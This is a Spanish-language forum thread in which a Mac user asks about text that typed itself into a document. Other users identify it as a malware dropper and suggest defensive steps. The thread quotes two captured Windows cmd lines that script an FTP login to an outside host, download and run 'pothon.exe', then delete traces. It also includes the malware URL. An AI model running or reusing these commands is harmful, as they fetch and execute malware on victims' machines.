¿Tengo un hacker? o_O

Buenas.

Bueno pues a ver. Tengo un iMac con Mac OS X lógicamente. Como muchos sabréis, la seguridad en Mac es alta y apenas hay virus, por no decir que no hay ninguno.

El caso es que ayer estaba escribiendo un artículo en el ordenador y de repente veo que empieza a escribirse texto de forma automática. Vamos, como si alguien estuviera tecleando en mi documento.

Al principio flipé, pensando que algún vecino había conectado su teclado a mi Mac por Bluetooth o algo, pero me hubiera salido una ventana de confirmación, entonces eso no puede ser.

No le di mucha importancia así que borré lo que había escrito X persona y seguí con mi trabajo. Lo que pasa es que luego volvió a suceder, 2 veces más.

Mirando lo que ha escrito, me parece algo sospechoso la verdad. Según entiendo por lo que pone, intenta acceder por FTP a un servidor y descargarse un tal pothon.exe, y luego deja algún mensaje de "bye" (no entiendo mucho de esto).

Os quería dejar el texto por si alguien tiene la más remota idea de lo que puede ser y de donde sale esto.

cmd -c echo open http://www.safkar.ro 21 .. ik 7echo user ftpsafkar 5afguz .. ik 7echo binary .. ik 7echo get pothon.exe .. ik 7echo bye .. ik 7ftp 'n 'v 'sñik 7del ik 7pothon.exe 7exit


La verdad es que me da paranoia pensar que alguien podría estar accediendo a mi ordenador o algo parecido, no se. :S

¿Alguien podría darme alguna pista sobre lo que es eso?

Gracias por vuestra ayuda.


Edit: Acabo de acordarme. Podría tener algo que ver el hecho de que me conecte a internet desde una red WiFi abierta? Ya que el cable del router no llega a mi cuarto, entonces me conecto a un punto de acceso que hay por ahí. xD
Fiuuu seria posible, te importa poner esto en macuarium? fijo que te ayudan mas rapido. Si quieres te lo escribo yo alli.

Si te vuelve a pasar, prueba a desconectarlo de la red, si lo tiene spor el ethernet, o apaga la airport ientras escribe el otro.

No recuerdas que te haya pedido contraseña de administrador en alguna ocasion sin venir acuento? es que me resulta extrañisimo que sin mas alguien te instale un troyano yen OSX.

Que te escribia? no seria alguien de tu casa, que se emparejo un movil y esta escribiendo?

Yo receurod que alguna vez se me han intentado conectar por bt, yauq eal tener el teclado y raton inhalambricos esta siempre enchufado.

Prueba tambiena desconectarl el bt.

Suerte.
Ahora probaré en Macuarium.

No recuerdo que me haya salido el admin de contraseñas en ningun momento inesperado. De momento he apagado el Bluetooth, a ver si vuelve a ocurrir o no.

También podría haber sido por el móvil, pero me parece raro porque según lo escrito, pide acceso por FTP y todo eso. Es lo que cité arriba, ese trozo de código.
Es un virus... entré a la dirección que da lo que copiaste y poniendo el archivo que dices (http://www.safkar.ro/pothon.exe) y el NOD32 detecta virus:

Adjuntos

neobeto86 escribió:Es un virus... entré a la dirección que da lo que copiaste y poniendo el archivo que dices (http://www.safkar.ro/pothon.exe) y el NOD32 detecta virus:


Buah, muchísimas gracias. Ya me olía algo sospechoso en todo esto... xDDD Lo que me pregunto es porqué sale lo que el tío ese escribe, o el virus, no se, en mi pantalla.

Tengo que dejar de conectarme a redes inalambricas ajenas. Tal vez esta sea la explicación de porqué se cuelga el portátil todos los días sin razón aparente (que es Windows XP y a ése si le puede afectar).

En fin, muchas gracias por ayudarme a identificar lo que es.
A mi me ha pasado lo mismo en mi PC

he podido ver que me entraban por el VNC que por despiste me deje con password demasiado facil... por suerte estada editando un mensaje y he podido capturar algo de lo que intentaba hacer

es esto...



%systemroot%\system32\cmd.exe
C echo open [url]www.[/url] Ftpsafkarinary >> ik &echo get pothon.exe >> iby-n –v –s:ik &del ik &pothon.exe &exit



a ver si va a ser un fallo del VNC, hace un tiempo encontraron un bug que permitia conectarse sin password...

estoy escaneando a ver si me ha dejado algo infectado...

alguien sabe que es lo que hace el pothon.exe este??? me huele que enviar SPAM, pues casualmente me he encontrado el servidor POP3 bloqueado esta mañana.
pero tio... si ese ejecutable es un .exe.... como se puede ejecutar un .exe en el sistema de mac?? la unica manera es virtualizando el sistema....

Yo creo que se lo que ha pasao:

Segun cuentas tienes una wifi abierta, pues bien, algun hijo de su madre, se ha metio en tu pc (no se como) por medio de la wifi, y el tio creyendo que tenias windows, te intento meter ese troyano, pero claro.... el tio no sabia que tenias mac instalao y al intentar ejecutar el programa le daria error....

Solucion: Pon clave a la wifi que sea WPA2 de 256 bits y dudo mucho que te entre alguien
6 respuestas